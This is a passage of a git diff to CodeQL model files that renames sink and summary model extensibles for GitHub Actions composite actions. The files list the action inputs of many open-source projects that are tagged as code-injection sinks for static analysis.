githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0..9f953b32ab1 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd..257b77bc2c3 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e..49f2f86907f 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b6..1e33c5e540a 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b4..cfbf15549c4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae4..24730af3d77 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed160..6be5abd09dd 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c..145b6f0d0e3 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb..c8b05bfd904 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7..04c218a76c1 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de..5447d4b7e2e 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aef..825ce27511d 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59e..8f3e49c9768 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d176051..1937367debc 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b78..01b77b7ccc6 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83fe..edbd28d401b 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae304..4b31bd66c5a 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b448269..a186fa070b0 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bdde..92ee2971e3a 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd..07b8e96bfe2 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd001458..2a2a5baab45 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a9..274fab01e92 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc1..3671de9e58a 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a3478..2ef34dac8ba 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c2..d76f20031e7 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baa..eccb5dae2bd 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e..3cbd3330ccd 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf6..73c9c1f24a2 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ff..90c4f699308 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e8..ed4e8820c99 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d16..df51b9fe4c8 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d..8fca8591ceb 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e424..819728cf718 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d..d3eaca780b4 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8..42c00ea216b 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b..a93d6a039d4 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9..8a7784a6f01 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3..1b22d43bfad 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b84..7175dd9450b 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c6983..dca0f00a4ec 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f4..5f75d4fd0cd 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc48..d34a6a1a388 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc..b7c5f7e214c 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68d..eead3b5ace3 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd406..be7043cfdbf 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a..36bdef9ad9a 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c..3d66b07df9f 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464..2f8a3fbdfa6 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e..e1acb54c724 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344..0a51c708799 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: 